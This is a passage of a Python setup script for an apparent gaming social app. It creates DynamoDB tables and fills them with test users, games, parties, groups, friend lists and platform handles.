1\n }\n )\n print(\"Table %s, Created: %s\" % (usernameTable.table_name, usernameTable.creation_date_time))\n\n gamesTable = dynamodb.create_table(\n TableName='Games',\n AttributeDefinitions=[\n {\n 'AttributeName': 'game_id',\n 'AttributeType': 'S'\n },\n {\n 'AttributeName': 'name',\n 'AttributeType': 'S'\n }\n ],\n KeySchema=[\n {\n 'AttributeName': 'game_id',\n 'KeyType': 'HASH'\n },\n {\n 'AttributeName': 'name',\n 'KeyType': 'RANGE'\n }\n ],\n ProvisionedThroughput={\n 'ReadCapacityUnits': 1,\n 'WriteCapacityUnits': 1\n },\n GlobalSecondaryIndexes=[\n {\n 'IndexName': 'name_index',\n 'KeySchema': [\n {\n 'AttributeName': 'name',\n 'KeyType': 'HASH'\n }\n ],\n 'Projection': {\n 'ProjectionType': 'KEYS_ONLY'\n },\n 'ProvisionedThroughput': {\n 'ReadCapacityUnits': 1,\n 'WriteCapacityUnits': 1\n }\n }\n ]\n )\n print(\"Table: %s, Created: %s\" % (gamesTable.table_name, gamesTable.creation_date_time))\n\n groupsTable = dynamodb.create_table(\n TableName='Groups',\n AttributeDefinitions=[\n {\n 'AttributeName': 'group_id',\n 'AttributeType': 'S'\n },\n {\n 'AttributeName': 'name',\n 'AttributeType': 'S'\n }\n ],\n KeySchema=[\n {\n 'AttributeName': 'group_id',\n 'KeyType': 'HASH'\n },\n {\n 'AttributeName': 'name',\n 'KeyType': 'RANGE'\n }\n ],\n ProvisionedThroughput={\n 'ReadCapacityUnits': 1,\n 'WriteCapacityUnits': 1\n }\n )\n print(\"Table: %s, Created: %s\" % (groupsTable.table_name, groupsTable.creation_date_time))\n\n partiesTable = dynamodb.create_table(\n TableName='Parties',\n AttributeDefinitions=[\n {\n 'AttributeName': 'game_name',\n 'AttributeType': 'S'\n },\n {\n 'AttributeName': 'start_time',\n 'AttributeType': 'S'\n }\n ],\n KeySchema=[\n {\n 'AttributeName': 'game_name',\n 'KeyType': 'HASH'\n },\n {\n 'AttributeName': 'start_time',\n 'KeyType': 'RANGE'\n }\n ],\n ProvisionedThroughput={\n 'ReadCapacityUnits': 1,\n 'WriteCapacityUnits': 1\n }\n )\n print(\"Table: %s, Created: %s\" % (partiesTable.table_name, partiesTable.creation_date_time))\n\n messagesTable = dynamodb.create_table(\n TableName='Messages',\n AttributeDefinitions=[\n {\n 'AttributeName': 'message_id',\n 'AttributeType': 'S'\n }\n ],\n KeySchema=[\n {\n 'AttributeName': 'message_id',\n 'KeyType': 'HASH'\n }\n ],\n ProvisionedThroughput={\n 'ReadCapacityUnits': 1,\n 'WriteCapacityUnits': 1\n }\n )\n print(\"Table: %s, Created: %s\" % (messagesTable.table_name, messagesTable.creation_date_time))\n\n platformsTable = dynamodb.create_table(\n TableName='Platforms',\n AttributeDefinitions=[\n {\n 'AttributeName': 'platform_name',\n 'AttributeType': 'S'\n }\n ],\n KeySchema=[\n {\n 'AttributeName': 'platform_name',\n 'KeyType': 'HASH'\n }\n ],\n ProvisionedThroughput={\n 'ReadCapacityUnits': 1,\n 'WriteCapacityUnits': 1\n }\n )\n print(\"Table: %s, Created: %s\" % (platformsTable.table_name, platformsTable.creation_date_time))\n\n genresTable = dynamodb.create_table(\n TableName='Genres',\n AttributeDefinitions=[\n {\n 'AttributeName': 'genre_name',\n 'AttributeType': 'S'\n }\n ],\n KeySchema=[\n {\n 'AttributeName': 'genre_name',\n 'KeyType': 'HASH'\n }\n ],\n ProvisionedThroughput={\n 'ReadCapacityUnits': 1,\n 'WriteCapacityUnits': 1\n }\n )\n print(\"Table: %s, Created: %s\" % (genresTable.table_name, genresTable.creation_date_time))\n\n print(\"END RootApp.initDynamoDB()\")\n\n @staticmethod\n def populateDynamoDB():\n \"\"\"\n populateDynamoDB() is used to fill the database with test data.\n :return: None\n \"\"\"\n print(\"BEGIN RootApp.populateDynamoDB()\")\n\n # Add test users\n LoginScreen.insertUserDynamoDB(\"test1@mail.com\", \"test_user1\", \"test123\", 'test-user-1')\n LoginScreen.insertUserDynamoDB(\"test2@mail.com\", \"test_user2\", \"test123\", 'test-user-2')\n LoginScreen.insertUserDynamoDB(\"test3@mail.com\", \"test_user3\", \"test123\", 'test-user-3')\n LoginScreen.insertUserDynamoDB(\"test4@mail.com\", \"test_user4\", \"test123\", 'test-user-4')\n LoginScreen.insertUserDynamoDB(\"test5@mail.com\", \"test_user5\", \"test123\", 'test-user-5')\n\n # Add games to 'Games' table.\n print(\"===== Add games to 'Games' table. =====\")\n gamesDB = DatabaseHelper.getDB()\n gamesTable = gamesDB.Table('Games')\n h3Id = 'test-game-1'\n h3Id1 = 'test-game-4'\n h3Name = 'Halo 3'\n sc2Id = 'test-game-2'\n sc2Name = 'StarCraft II: Wings of Liberty'\n rsId = 'test-game-3'\n rsName = 'RuneScape'\n\n halo3_360 = gamesTable.put_item(\n TableName='Games',\n Item={\n 'game_id': h3Id,\n 'name': h3Name,\n 'information': {\n 'release_date':\n {\n 'NA': 'September 25, 2007',\n 'EU': 'September 26, 2007',\n 'JP': 'September 27, 2007'\n },\n 'summary': '3rd game of Halo Franchise',\n 'developers': ['Bungie'],\n 'publishers': ['Microsoft Game Studios'],\n 'artists': ['Marcus Lehto'],\n 'writers': ['Joseph Staten'],\n 'composers': ['Martin O\\'Donnell,', 'Michael Salvatori'],\n 'series': 'Halo',\n 'genres': ['FPS'],\n 'modes': ['single-player', 'multiplayer']\n\n },\n 'platform': 'Xbox 360',\n 'followers': [],\n 'groups': [],\n 'confirmed': True,\n 'confirmation_votes': 0\n }\n )\n\n halo3_One = gamesTable.put_item(\n TableName='Games',\n Item={\n 'game_id': h3Id1,\n 'name': h3Name,\n 'information': {\n 'release_date':\n {\n 'NA': 'September 25, 2007',\n 'EU': 'September 26, 2007',\n 'JP': 'September 27, 2007'\n },\n 'summary': '3rd game of Halo Franchise',\n 'developers': ['Bungie'],\n 'publishers': ['Microsoft Game Studios'],\n 'artists': ['Marcus Lehto'],\n 'writers': ['Joseph Staten'],\n 'composers': ['Martin O\\'Donnell,', 'Michael Salvatori'],\n 'series': 'Halo',\n 'genres': ['FPS'],\n 'modes': ['single-player', 'multiplayer']\n\n },\n 'platform': 'Xbox One',\n 'followers': [],\n 'groups': [],\n 'confirmed': True,\n 'confirmation_votes': 0\n }\n )\n\n sc2 = gamesTable.put_item(\n TableName='Games',\n Item={\n 'game_id': sc2Id,\n 'name': sc2Name,\n 'information': {\n 'release_date':\n {\n 'WW': 'July 27, 2010'\n },\n\n 'summary': 'StarCraft II: Wings of Liberty is a military science fiction real-time strategy video \\\n game developed and published by Blizzard Entertainment.',\n\n 'developers': ['Blizzard Entertainment'],\n 'publishers': ['Blizzard Entertainment'],\n 'producers': ['Chris Sigaty'],\n 'designers': ['Dustin Browder', 'Matthew Morris'],\n 'programmers': ['Carl Chimes', 'Bob Fitch'],\n 'artists': ['Samwise Didier'],\n 'writers': ['Chris Metzen', 'Andrew Chambers', 'Brian Kindregan'],\n 'composers': ['Derek Duke', 'Glenn Stafford', 'Russell Brower', 'Neal Acree'],\n 'series': 'StarCraft',\n 'engine': 'Havok',\n 'genres': ['RTS'],\n 'modes': ['single-player', 'multiplayer']\n },\n 'platform': 'PC',\n 'followers': [],\n 'groups': [],\n 'confirmed': True,\n 'confirmation_votes': 0\n }\n )\n\n rs = gamesTable.put_item(\n TableName='Games',\n Item={\n 'game_id': rsId,\n 'name': rsName,\n 'information': {\n 'release_date': {\n 'WW': 'January 4, 2001'\n },\n 'developers': ['Jagex'],\n 'publishers': ['Jagex'],\n 'distributors': ['Jagex'],\n 'designers': ['Andrew Gower', 'Paul Gower'],\n 'composers': ['Ian Taylor', 'James Hannigan'],\n 'genres': ['MMORPG'],\n 'modes': ['multiplayer'],\n 'summary': 'A fantasy-style massively multiplayer online roleplaying game!'\n },\n 'platform': 'PC',\n 'followers': [],\n 'groups': [],\n 'confirmed': True,\n 'confirmation_votes': 0\n }\n )\n\n # Add platforms to 'Platforms' table.\n print(\"===== Add platforms to 'Platforms' table. =====\")\n platformsDB = DatabaseHelper.getDB()\n platformsTable = platformsDB.Table('Platforms')\n xbox360 = 'Xbox 360'\n xbox360games = [\n h3Name\n ]\n pc = 'PC'\n pcGames = [\n sc2Name,\n rsName\n ]\n xboxOne = 'Xbox One'\n xboxOneGames = [\n h3Name\n ]\n\n platformsTable.put_item(\n TableName='Platforms',\n Item={\n 'platform_name': xbox360,\n 'games': xbox360games\n }\n )\n\n platformsTable.put_item(\n TableName='Platforms',\n Item={\n 'platform_name': pc,\n 'games': pcGames\n }\n )\n\n platformsTable.put_item(\n TableName='Platforms',\n Item={\n 'platform_name': xboxOne,\n 'games': xboxOneGames\n }\n )\n\n # Add genres to 'Genres' table.\n print(\"===== Add genres to 'Genres' table. =====\")\n genresDB = DatabaseHelper.getDB()\n genresTable = genresDB.Table('Genres')\n fps = 'FPS'\n rts = 'RTS'\n mmo = 'MMORPG'\n\n fpsGames = [h3Name]\n rtsGames = [sc2Name]\n mmoGames = [rsName]\n\n genresTable.put_item(\n TableName='Genres',\n Item={\n 'genre_name': fps,\n 'games': fpsGames\n }\n )\n\n genresTable.put_item(\n TableName='Genres',\n Item={\n 'genre_name': rts,\n 'games': rtsGames\n }\n )\n\n genresTable.put_item(\n TableName='Genres',\n Item={\n 'genre_name': mmo,\n 'games': mmoGames\n }\n )\n\n # Add parties to 'Parties' table\n print(\"===== Add parties to 'Parties' table =====\")\n partiesDB = DatabaseHelper.getDB()\n partiesTable = partiesDB.Table('Parties')\n\n party1Time = str(datetime.datetime.utcnow())\n party1ExpireTime = str(datetime.datetime.utcnow() + datetime.timedelta(days=1))\n testParty1 = partiesTable.put_item(\n TableName='Parties',\n Item={\n 'party_id': 'test-party-1',\n 'game_id': h3Id,\n 'game_name': h3Name,\n 'platform': 'Xbox 360',\n 'founder': {\n 'uid': 'test-user-1',\n 'username': 'test_user1'\n },\n 'members': [\n {\n 'uid': 'test-user-1',\n 'username': 'test_user1'\n },\n {\n 'uid': 'test-user-2',\n 'username': 'test_user2'\n },\n {\n 'uid': 'test-user-5',\n 'username': 'test_user5'\n }\n ],\n 'competitive': False,\n 'member_count': 3,\n 'start_time': party1Time,\n 'expire_time': party1ExpireTime,\n 'activity_start_time': '2017-06-16 16:28:52.976000',\n 'active_now': False,\n 'disbanded': False,\n 'description': 'Halo 3 Test Party'\n }\n )\n\n party2Time = str(datetime.datetime.utcnow())\n party2ExpireTime = str(datetime.datetime.utcnow() + datetime.timedelta(days=1))\n testParty2 = partiesTable.put_item(\n TableName='Parties',\n Item={\n 'party_id': 'test-party-2',\n 'game_id': sc2Id,\n 'game_name': sc2Name,\n 'platform': 'PC',\n 'founder': {\n 'uid': 'test-user-2',\n 'username': 'test_user2'\n },\n 'members': [\n {\n 'uid': 'test-user-2',\n 'username': 'test_user2'\n },\n {\n 'uid': 'test-user-4',\n 'username': 'test_user4'\n },\n {\n 'uid': 'test-user-3',\n 'username': 'test_user3'\n }\n ],\n 'competitive': True,\n 'member_count': 3,\n 'start_time': party2Time,\n 'expire_time': party2ExpireTime,\n 'activity_start_time': '2017-06-16 16:28:52.976000',\n 'active_now': False,\n 'disbanded': False,\n 'description': 'SC2 Test Party'\n }\n )\n\n party3Time = str(datetime.datetime.utcnow())\n party3ExpireTime = str(datetime.datetime.utcnow() + datetime.timedelta(days=1))\n testParty3 = partiesTable.put_item(\n TableName='Parties',\n Item={\n 'party_id': 'test-party-3',\n 'game_id': rsId,\n 'game_name': rsName,\n 'platform': 'PC',\n 'founder': {\n 'uid': 'test-user-3',\n 'username': 'test_user3'\n },\n 'members': [\n {\n 'uid': 'test-user-5',\n 'username': 'test_user5'\n },\n {\n 'uid': 'test-user-4',\n 'username': 'test_user4'\n },\n {\n 'uid': 'test-user-3',\n 'username': 'test_user3'\n }\n ],\n 'competitive': False,\n 'member_count': 3,\n 'start_time': party3Time,\n 'expire_time': party3ExpireTime,\n 'activity_start_time': '2017-06-16 16:28:52.976000',\n 'active_now': True,\n 'disbanded': False,\n 'description': 'RuneScape Test Party'\n }\n )\n\n # Add groups to 'Groups' table\n print(\"===== Add groups to 'Groups' table =====\")\n groupsDB = DatabaseHelper.getDB()\n groupsTable = groupsDB.Table('Groups')\n\n testGroup1 = groupsTable.put_item(\n TableName='Groups',\n Item={\n 'group_id': 'test-group-1',\n 'name': 'First Test Group',\n 'members': [\n {\n 'uid': 'test-user-5',\n 'username': 'test_user5'\n },\n {\n 'uid': 'test-user-4',\n 'username': 'test_user4'\n },\n {\n 'uid': 'test-user-3',\n 'username': 'test_user3'\n }\n ],\n 'games': [\n {\n 'game_id': rsId,\n 'game_name': rsName,\n 'platform': pc\n },\n {\n 'game_id': sc2Id,\n 'game_name': sc2Name,\n 'platform': pc\n }\n ],\n 'consoles': ['PC'],\n 'founder': {\n 'uid': 'test-user-5',\n 'username': 'test_user5'\n },\n 'admins': [\n {\n 'uid': 'test-user-5',\n 'username': 'test_user5'\n },\n {\n 'uid': 'test-user-4',\n 'username': 'test_user4'\n }\n ],\n 'activities': [],\n 'competitive': False,\n 'member_count': 3,\n 'date_founded': '2017-06-16',\n 'description': 'This is a test group!',\n 'disbanded': False\n }\n )\n\n testGroup2 = groupsTable.put_item(\n TableName='Groups',\n Item={\n 'group_id': 'test-group-2',\n 'name': 'Second Test Group',\n 'members': [\n {\n 'uid': 'test-user-1',\n 'username': 'test_user1'\n },\n {\n 'uid': 'test-user-2',\n 'username': 'test_user2'\n },\n {\n 'uid': 'test-user-3',\n 'username': 'test_user3'\n }\n ],\n 'games': [\n {\n 'game_id': h3Id,\n 'game_name': h3Name,\n 'platform': xbox360\n }\n ],\n 'consoles': ['Xbox 360'],\n 'founder': {\n 'uid': 'test-user-1',\n 'username': 'test_user1'\n },\n 'admins': [\n {\n 'uid': 'test-user-1',\n 'username': 'test_user1'\n },\n {\n 'uid': 'test-user-3',\n 'username': 'test_user3'\n }\n ],\n 'activities': [],\n 'competitive': True,\n 'member_count': 3,\n 'date_founded': '2017-06-16',\n 'description': 'This is a test group!',\n 'disbanded': False\n }\n )\n\n testGroup3 = groupsTable.put_item(\n TableName='Groups',\n Item={\n 'group_id': 'test-group-3',\n 'name': 'Third Test Group',\n 'members': [\n {\n 'uid': 'test-user-2',\n 'username': 'test_user2'\n },\n {\n 'uid': 'test-user-4',\n 'username': 'test_user4'\n },\n {\n 'uid': 'test-user-5',\n 'username': 'test_user5'\n },\n {\n 'uid': 'test-user-1',\n 'username': 'test_user1'\n }\n ],\n 'games': [\n {\n 'game_id': sc2Id,\n 'game_name': sc2Name,\n 'platform': pc\n }\n ],\n 'consoles': ['PC'],\n 'founder': {\n 'uid': 'test-user-2',\n 'username': 'test_user2'\n },\n 'admins': [\n {\n 'uid': 'test-user-2',\n 'username': 'test_user2'\n }\n ],\n 'activities': [],\n 'competitive': True,\n 'member_count': 4,\n 'date_founded': '2017-06-16',\n 'description': 'This is a test group!',\n 'disbanded': False\n }\n )\n\n # Update games\n rsGroups = [{\n 'group_id': 'test-group-1',\n 'name': 'First Test Group'\n }]\n\n sc2Groups = [\n {\n 'group_id': 'test-group-1',\n 'name': 'First Test Group'\n },\n {\n 'group_id': 'test-group-3',\n 'name': 'Third Test Group'\n }\n ]\n\n h3Groups = [{\n 'group_id': 'test-group-2',\n 'name': 'Second Test Group'\n }]\n\n rsUpdate = gamesTable.update_item(\n Key={\n 'game_id': rsId,\n 'name': rsName\n },\n UpdateExpression='SET groups = list_append(groups, :g)',\n ExpressionAttributeValues={\n ':g': rsGroups\n },\n ReturnValues='ALL_NEW'\n )\n\n h3Update = gamesTable.update_item(\n Key={\n 'game_id': h3Id,\n 'name': h3Name\n },\n UpdateExpression='SET groups = list_append(groups, :g)',\n ExpressionAttributeValues={\n ':g': h3Groups\n },\n ReturnValues='ALL_NEW'\n )\n\n sc2Update = gamesTable.update_item(\n Key={\n 'game_id': sc2Id,\n 'name': sc2Name\n },\n UpdateExpression='SET groups = list_append(groups, :g)',\n ExpressionAttributeValues={\n ':g': sc2Groups\n },\n ReturnValues='ALL_NEW'\n )\n\n # Update user memberships\n print(\"===== Update user memberships =====\")\n friendsDB = DatabaseHelper.getDB()\n usersTable = friendsDB.Table('Users')\n\n party1 = [\n {\n 'game_name': 'Halo 3',\n 'start_time': party1Time\n }\n ]\n party2 = [\n {\n 'game_name': 'StarCraft II: Wings of Liberty',\n 'start_time': party2Time\n }\n ]\n party3 = [\n {\n 'game_name': 'RuneScape',\n 'start_time': party3Time\n }\n ]\n\n group1User5 = [\n {\n 'group_id': 'test-group-1',\n 'group_name': 'First Test Group',\n 'is_admin': True\n }\n ]\n group1User4 = [\n {\n 'group_id': 'test-group-1',\n 'group_name': 'First Test Group',\n 'is_admin': True\n }\n ]\n group1User3 = [\n {\n 'group_id': 'test-group-1',\n 'group_name': 'First Test Group',\n 'is_admin': False\n }\n ]\n group2User1 = [\n {\n 'group_id': 'test-group-2',\n 'group_name': 'Second Test Group',\n 'is_admin': True\n }\n ]\n group2User2 = [\n {\n 'group_id': 'test-group-2',\n 'group_name': 'Second Test Group',\n 'is_admin': False\n }\n ]\n group2User3 = [\n {\n 'group_id': 'test-group-2',\n 'group_name': 'Second Test Group',\n 'is_admin': True\n }\n ]\n group3User2 = [\n {\n 'group_id': 'test-group-3',\n 'group_name': 'Third Test Group',\n 'is_admin': True\n }\n ]\n group3User4 = [\n {\n 'group_id': 'test-group-3',\n 'group_name': 'Third Test Group',\n 'is_admin': False\n }\n ]\n group3User5 = [\n {\n 'group_id': 'test-group-3',\n 'group_name': 'Third Test Group',\n 'is_admin': False\n }\n ]\n group3User1 = [\n {\n 'group_id': 'test-group-3',\n 'group_name': 'Third Test Group',\n 'is_admin': False\n }\n ]\n\n user1Party1 = usersTable.update_item(\n Key={\n 'uid': 'test-user-1',\n 'username': 'test_user1'\n },\n UpdateExpression='set members_of_parties = list_append(members_of_parties, :p)',\n ExpressionAttributeValues={\n ':p': party1\n },\n ReturnValues='ALL_NEW'\n )\n user2Party1 = usersTable.update_item(\n Key={\n 'uid': 'test-user-2',\n 'username': 'test_user2'\n },\n UpdateExpression='set members_of_parties = list_append(members_of_parties, :p)',\n ExpressionAttributeValues={\n ':p': party1\n },\n ReturnValues='ALL_NEW'\n )\n user5Party1 = usersTable.update_item(\n Key={\n 'uid': 'test-user-5',\n 'username': 'test_user5'\n },\n UpdateExpression='set members_of_parties = list_append(members_of_parties, :p)',\n ExpressionAttributeValues={\n ':p': party1\n },\n ReturnValues='ALL_NEW'\n )\n user2Party2 = usersTable.update_item(\n Key={\n 'uid': 'test-user-2',\n 'username': 'test_user2'\n },\n UpdateExpression='set members_of_parties = list_append(members_of_parties, :p)',\n ExpressionAttributeValues={\n ':p': party2\n },\n ReturnValues='ALL_NEW'\n )\n user4Party2 = usersTable.update_item(\n Key={\n 'uid': 'test-user-4',\n 'username': 'test_user4'\n },\n UpdateExpression='set members_of_parties = list_append(members_of_parties, :p)',\n ExpressionAttributeValues={\n ':p': party2\n },\n ReturnValues='ALL_NEW'\n )\n user3Party2 = usersTable.update_item(\n Key={\n 'uid': 'test-user-3',\n 'username': 'test_user3'\n },\n UpdateExpression='set members_of_parties = list_append(members_of_parties, :p)',\n ExpressionAttributeValues={\n ':p': party2\n },\n ReturnValues='ALL_NEW'\n )\n user5Party3 = usersTable.update_item(\n Key={\n 'uid': 'test-user-5',\n 'username': 'test_user5'\n },\n UpdateExpression='set members_of_parties = list_append(members_of_parties, :p)',\n ExpressionAttributeValues={\n ':p': party3\n },\n ReturnValues='ALL_NEW'\n )\n user4Party3 = usersTable.update_item(\n Key={\n 'uid': 'test-user-4',\n 'username': 'test_user4'\n },\n UpdateExpression='set members_of_parties = list_append(members_of_parties, :p)',\n ExpressionAttributeValues={\n ':p': party3\n },\n ReturnValues='ALL_NEW'\n )\n user3Party3 = usersTable.update_item(\n Key={\n 'uid': 'test-user-3',\n 'username': 'test_user3'\n },\n UpdateExpression='set members_of_parties = list_append(members_of_parties, :p)',\n ExpressionAttributeValues={\n ':p': party3\n },\n ReturnValues='ALL_NEW'\n )\n\n user5Group1 = usersTable.update_item(\n Key={\n 'uid': 'test-user-5',\n 'username': 'test_user5'\n },\n UpdateExpression='set members_of_groups = list_append(members_of_groups, :g)',\n ExpressionAttributeValues={\n ':g': group1User5\n },\n ReturnValues='ALL_NEW'\n )\n user4Group1 = usersTable.update_item(\n Key={\n 'uid': 'test-user-4',\n 'username': 'test_user4'\n },\n UpdateExpression='set members_of_groups = list_append(members_of_groups, :g)',\n ExpressionAttributeValues={\n ':g': group1User4\n },\n ReturnValues='ALL_NEW'\n )\n user3Group1 = usersTable.update_item(\n Key={\n 'uid': 'test-user-3',\n 'username': 'test_user3'\n },\n UpdateExpression='set members_of_groups = list_append(members_of_groups, :g)',\n ExpressionAttributeValues={\n ':g': group1User3\n },\n ReturnValues='ALL_NEW'\n )\n user1Group2 = usersTable.update_item(\n Key={\n 'uid': 'test-user-1',\n 'username': 'test_user1'\n },\n UpdateExpression='set members_of_groups = list_append(members_of_groups, :g)',\n ExpressionAttributeValues={\n ':g': group2User1\n },\n ReturnValues='ALL_NEW'\n )\n user2Group2 = usersTable.update_item(\n Key={\n 'uid': 'test-user-2',\n 'username': 'test_user2'\n },\n UpdateExpression='set members_of_groups = list_append(members_of_groups, :g)',\n ExpressionAttributeValues={\n ':g': group2User2\n },\n ReturnValues='ALL_NEW'\n )\n user3Group2 = usersTable.update_item(\n Key={\n 'uid': 'test-user-3',\n 'username': 'test_user3'\n },\n UpdateExpression='set members_of_groups = list_append(members_of_groups, :g)',\n ExpressionAttributeValues={\n ':g': group2User3\n },\n ReturnValues='ALL_NEW'\n )\n user2Group3 = usersTable.update_item(\n Key={\n 'uid': 'test-user-2',\n 'username': 'test_user2'\n },\n UpdateExpression='set members_of_groups = list_append(members_of_groups, :g)',\n ExpressionAttributeValues={\n ':g': group3User2\n },\n ReturnValues='ALL_NEW'\n )\n user4Group3 = usersTable.update_item(\n Key={\n 'uid': 'test-user-4',\n 'username': 'test_user4'\n },\n UpdateExpression='set members_of_groups = list_append(members_of_groups, :g)',\n ExpressionAttributeValues={\n ':g': group3User4\n },\n ReturnValues='ALL_NEW'\n )\n user5Group3 = usersTable.update_item(\n Key={\n 'uid': 'test-user-5',\n 'username': 'test_user5'\n },\n UpdateExpression='set members_of_groups = list_append(members_of_groups, :g)',\n ExpressionAttributeValues={\n ':g': group3User5\n },\n ReturnValues='ALL_NEW'\n )\n user1Group3 = usersTable.update_item(\n Key={\n 'uid': 'test-user-1',\n 'username': 'test_user1'\n },\n UpdateExpression='set members_of_groups = list_append(members_of_groups, :g)',\n ExpressionAttributeValues={\n ':g': group3User1\n },\n ReturnValues='ALL_NEW'\n )\n\n # Give users friends\n print(\"===== Give users friends =====\")\n user1 = [{\n 'uid': 'test-user-1',\n 'username': 'test_user1'\n }]\n user2 = [{\n 'uid': 'test-user-2',\n 'username': 'test_user2'\n }]\n user3 = [{\n 'uid': 'test-user-3',\n 'username': 'test_user3'\n }]\n user4 = [{\n 'uid': 'test-user-4',\n 'username': 'test_user4'\n }]\n user5 = [{\n 'uid': 'test-user-5',\n 'username': 'test_user5'\n }]\n\n user1Friend2 = usersTable.update_item(\n Key={\n 'uid': 'test-user-1',\n 'username': 'test_user1'\n },\n UpdateExpression='set friends = list_append(friends, :i)',\n ExpressionAttributeValues={\n ':i': user2\n },\n ReturnValues='ALL_NEW'\n )\n\n user1Friend3 = usersTable.update_item(\n Key={\n 'uid': 'test-user-1',\n 'username': 'test_user1'\n },\n UpdateExpression='set friends = list_append(friends, :i)',\n ExpressionAttributeValues={\n ':i': user3\n },\n ReturnValues='ALL_NEW'\n )\n\n user2Friend1 = usersTable.update_item(\n Key={\n 'uid': 'test-user-2',\n 'username': 'test_user2'\n },\n UpdateExpression='set friends = list_append(friends, :i)',\n ExpressionAttributeValues={\n ':i': user1\n },\n ReturnValues='ALL_NEW'\n )\n\n user2Friend4 = usersTable.update_item(\n Key={\n 'uid': 'test-user-2',\n 'username': 'test_user2'\n },\n UpdateExpression='set friends = list_append(friends, :i)',\n ExpressionAttributeValues={\n ':i': user4\n },\n ReturnValues='ALL_NEW'\n )\n\n user3Friend1 = usersTable.update_item(\n Key={\n 'uid': 'test-user-3',\n 'username': 'test_user3'\n },\n UpdateExpression='set friends = list_append(friends, :i)',\n ExpressionAttributeValues={\n ':i': user1\n },\n ReturnValues='ALL_NEW'\n )\n\n user3Friend5 = usersTable.update_item(\n Key={\n 'uid': 'test-user-3',\n 'username': 'test_user3'\n },\n UpdateExpression='set friends = list_append(friends, :i)',\n ExpressionAttributeValues={\n ':i': user5\n },\n ReturnValues='ALL_NEW'\n )\n\n user4Friend2 = usersTable.update_item(\n Key={\n 'uid': 'test-user-4',\n 'username': 'test_user4'\n },\n UpdateExpression='set friends = list_append(friends, :i)',\n ExpressionAttributeValues={\n ':i': user2\n },\n ReturnValues='ALL_NEW'\n )\n\n user4Friend5 = usersTable.update_item(\n Key={\n 'uid': 'test-user-4',\n 'username': 'test_user4'\n },\n UpdateExpression='set friends = list_append(friends, :i)',\n ExpressionAttributeValues={\n ':i': user5\n },\n ReturnValues='ALL_NEW'\n )\n\n user5Friend3 = usersTable.update_item(\n Key={\n 'uid': 'test-user-5',\n 'username': 'test_user5'\n },\n UpdateExpression='set friends = list_append(friends, :i)',\n ExpressionAttributeValues={\n ':i': user3\n },\n ReturnValues='ALL_NEW'\n )\n\n user5Friend4 = usersTable.update_item(\n Key={\n 'uid': 'test-user-5',\n 'username': 'test_user5'\n },\n UpdateExpression='set friends = list_append(friends, :i)',\n ExpressionAttributeValues={\n ':i': user4\n },\n ReturnValues='ALL_NEW'\n )\n\n # Give users handles\n print(\"===== Give users handles =====\")\n handles1 = [\n {\n 'handle_type': 'SOCIAL',\n 'platform_name': 'Facebook',\n 'handle_name': 'test1_FB'\n },\n {\n 'handle_type': 'SOCIAL',\n 'platform_name': 'Twitter',\n 'handle_name': 'test1_Tweet'\n },\n {\n 'handle_type': 'GAMING',\n 'platform_name': 'Xbox Live',\n 'handle_name': 'test1_Xbox'\n },\n {\n 'handle_type': 'GAMING',\n 'platform_name': 'Playstation Network',\n 'handle_name': 'test1_PSN'\n }\n ]\n handles2 = [\n {\n 'handle_type': 'SOCIAL',\n 'platform_name': 'Facebook',\n 'handle_name': 'test2_FB'\n },\n {\n 'handle_type': 'SOCIAL',\n 'platform_name': 'Twitter',\n 'handle_name': 'test2_Tweet'\n },\n {\n 'handle_type': 'GAMING',\n 'platform_name': 'Xbox Live',\n 'handle_name': 'test2_Xbox'\n },\n {\n 'handle_type': 'GAMING',\n 'platform_name': 'Steam',\n 'handle_name': 'test2_Steam'\n }\n ]\n handles3 = [\n {\n 'handle_type': 'SOCIAL',\n 'platform_name': 'Facebook',\n 'handle_name': 'test3_FB'\n },\n {\n 'handle_type': 'SOCIAL',\n 'platform_name': 'Twitter',\n 'handle_name': 'test3_Tweet'\n },\n {\n 'handle_type': 'GAMING',\n 'platform_name': 'Steam',\n 'handle_name': 'test3_Steam'\n },\n {\n 'handle_type': 'GAMING',\n 'platform_name': 'Playstation Network',\n 'handle_name': 'test1_PSN'\n }\n ]\n handles4 = [\n {\n 'handle_type': 'SOCIAL',\n 'platform_name': 'Facebook',\n 'handle_name': 'test4_FB'\n },\n {\n 'handle_type': 'SOCIAL',\n 'platform_name': 'Twitter',\n 'handle_name': 'test4_Tweet'\n },\n {\n 'handle_type': 'GAMING',\n 'platform_name': 'Xbox Live',\n 'handle_name': 'test4_Xbox'\n },\n {\n 'handle_type': 'GAMING',\n 'platform_name': 'Steam',\n 'handle_name': 'test4_Steam'\n }\n ]\n handles5 = [\n {\n 'handle_type': 'SOCIAL',\n 'platform_name': 'Facebook',\n 'handle_name': 'test5_FB'\n },\n {\n 'handle_type': 'SOCIAL',\n 'platform_name': 'Twitter',\n 'handle_name': 'test5_Tweet'\n },\n {\n 'handle_type': 'GAMING',\n 'platform_name': 'Steam',\n 'handle_name': 'test5_Steam'\n },\n {\n 'handle_type': 'GAMING',\n 'platform_name': 'Playstation Network',\n 'handle_name': 'test5_PSN'\n }\n ]\n\n user1Handles = usersTable.update_item(\n Key={\n 'uid': 'test-user-1',\n 'username': 'test_user1'\n },\n UpdateExpression='set handles = list_append(handles, :h)',\n ExpressionAttributeValues={\n ':h': handles1\n },\n ReturnValues='ALL_NEW'\n )\n\n user2Handles = usersTable.update_item(\n Key={\n 'uid': 'test-user-2',\n 'username': 'test_user2'\n },\n UpdateExpression='set handles = list_append(handles, :h)',\n ExpressionAttributeValues={\n ':h': handles2\n },\n ReturnValues='ALL_NEW'\n )\n\n user3Handles = usersTable.update_item(\n Key={\n 'uid': 'test-user-3',\n 'username': 'test_user3'\n },\n UpdateExpression='set handles = list_append(handles, :h)',\n ExpressionAttributeValues={\n ':h': handles3\n },\n ReturnValues='ALL_NEW'\n )\n\n user4Handles = usersTable.update_item(\n Key={\n 'uid': 'test-user-4',\n 'username': 'test_user4'\n },\n UpdateExpression='set handles = list_append(handles, :h)',\n ExpressionAttributeValues={\n ':h': handles4\n },\n ReturnValues='ALL_NEW'\n )\n\n user5Handles = usersTable.update_item(\n Key={\n 'uid': 'test-user-5',\n 'username': 'test_user5'\n },\n UpdateExpression='set handles = list_append(handles, :h)',\n ExpressionAttributeValues={\n ':h': handles5\n },\n ReturnValues='ALL_NEW'\n )\n\n # Give users privacy settings\n print(\"===== Give users privacy settings =====\")\n privacy1Games = [\n {\n 'platform_name': 'Xbox Live',\n 'visible_to': 'FRIENDS'\n },\n {\n 'platform_name': 'Playstation Network',\n 'visible_to': 'ALL'\n }\n ]\n privacy2Games = [\n {\n 'platform_name': 'Xbox 